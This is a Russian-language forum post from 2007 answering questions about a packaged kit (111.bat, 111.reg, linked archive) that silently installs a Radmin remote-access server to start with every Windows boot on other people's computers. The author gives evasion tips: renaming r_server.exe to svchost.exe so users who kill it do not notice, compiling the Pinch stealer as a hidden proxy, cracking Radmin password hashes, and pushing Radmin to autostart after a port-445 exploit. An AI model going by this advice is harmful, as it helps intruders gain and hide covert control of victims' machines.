Показать сообщение отдельно

Старый 09.03.2007, 22:50
Elekt
Banned
С нами: 10752806

тех. поддержка пришла =)

Цитата:
...но веть для того чтобы он заработал нужно ресет машины, или же ресет выполняется только после первого заселения?
после запуска 111.bat сервер стартует.
По непонятной особенности есть маленькая задержка при старте, кажется как будто нефига не вышло, коннекта нет и прочее. Подождите пару минут.
Так же опыты показали, что(по так и не выясненным причинам) мгновенно выйти из ступора помогает команда
dir c:\windows

Цитата:
А мне скажите кто-нибудь =*( Какой порт надо сканировать? 445 / tcp?
который прописан в 111.reg
у меня там стоит 4899

Цитата:
И как можно поменять порт что нужно где написать чтоб поменять ?
Пишу тебе потому что тема молчит!
я ставил радмин себе, выставлял порт, после чего смотрел на ключ реестра.
По другому можно только дизасемблировав и выяснив алгоритм шифрования.

Цитата:
А в этом архиве http://sec-123.narod.ru/radmin/4.rar
находится стоит только запустить 111.bat и все и с каждой загрузки windows будет запускаться radmin server,да ?
ДА

Цитата:
там в первом посте говорили про програму PasswordPro и хеч ею паролей для реадмина. вопрос.
у меня в списке нету вида хеча \"RADMIN\" где взять?
passwordspro v.1.3.1.2
в старших версиях радмин убрали хз почему

Цитата:
Многие продвинутые юзеры отключают R_server через дипечер задач для полного спокойствия. Можно ли сделать скрипт, чтоб запускал ещё какую нить ненужную службу , не вредящую компу в смысле безопасности.Для спокойствия граждан столь продвинутых.
я щас уже не помню, как обозвал билд сервера
вобщем достаточно переименовать r_server.exe во что нить неприметное типа svchost.exe ну и в скриптах имя поправить на новое.

Если влом\не можешь написать прогу, висящую в процессах - скомпилируй ксинча\пинча на режим прокси сервера, отключив всё остальное. палицца тогда не должен и в процессах будет висеть

Цитата:
Подрубаюсь к машине через 445 порт сплойтом...
Как закинуть через telnet радмина а автозагрузку?
кликни на мое видео